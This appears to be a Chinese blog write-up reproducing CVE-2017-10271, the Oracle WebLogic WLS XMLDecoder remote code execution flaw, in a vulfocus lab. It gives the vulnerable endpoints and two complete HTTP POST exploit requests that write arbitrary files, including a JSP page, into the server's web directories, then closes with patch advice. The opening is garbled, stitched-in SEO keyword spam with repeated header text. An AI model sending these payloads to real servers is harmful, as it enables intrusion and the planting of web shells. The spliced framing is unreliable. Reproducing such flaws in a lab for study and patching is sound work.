无为建设局网站,移动端网站开发环境,保险公司官网,wordpress网站维护插件Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议 漏洞名称
漏洞描述
在Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.3/2.2.1/1.10/12.2.1.1/22.0#xff08;Application … Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议 漏洞名称
漏洞描述
在Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.3/2.2.1/1.10/12.2.1.1/22.0Application Server Soft ware中发现了一个被归类为非常严重的漏洞。这会影响组件WLS Security的未知代码。
影响版本
Oracle Weblogic_Server 12.2.1.1.0 Oracle Weblogic_Server 10.3.6.0.0 Oracle Weblogic_Server 12.1.3.0.0 Oracle Weblogic_Server 12.2.1.2.0
漏洞复现
环境搭建
受害者IP192.168.63.129:53342 攻击者IP192.168.63.1
vulfocus下载链接
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git启动vulfocus
docker-compose up -d 环境启动后访问http://192.168.63.129:53342即可看到一个404页面说明已成功启动。 漏洞的URL
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType1访问路径/wls-wsat/CoordinatorPortType,出现下图所示页面说明可能存在漏洞。
漏洞利用
上传test.txt文件尝试一下
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/soapenv:Headerwork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.6.0 classjava.beans.XMLDecoderobject classjava.io.PrintWriterstringservers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt/stringvoid methodprintlnstringxmldecoder_vul_test/string/voidvoid methodclose//object/java/work:WorkContext/soapenv:Headersoapenv:Body/
/soapenv:Envelope访问URLhttp://192.168.63.129:57677/wls-wsat/test.txt 上传test.jsp尝试一下
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/soapenv:Headerwork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.6.0 classjava.beans.XMLDecoderobject classjava.io.PrintWriterstringservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp/stringvoid methodprintlnstring![CDATA[ % out.print(test); % ]]/string/voidvoid methodclose//object/java/work:WorkContext/soapenv:Headersoapenv:Body/
/soapenv:Envelope访问路径http://192.168.63.129:57677/bea_wls_internal/test.jsp 修复建议
目前官方已有可更新版本建议受影响用户升级至最新版本。 补丁链接http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
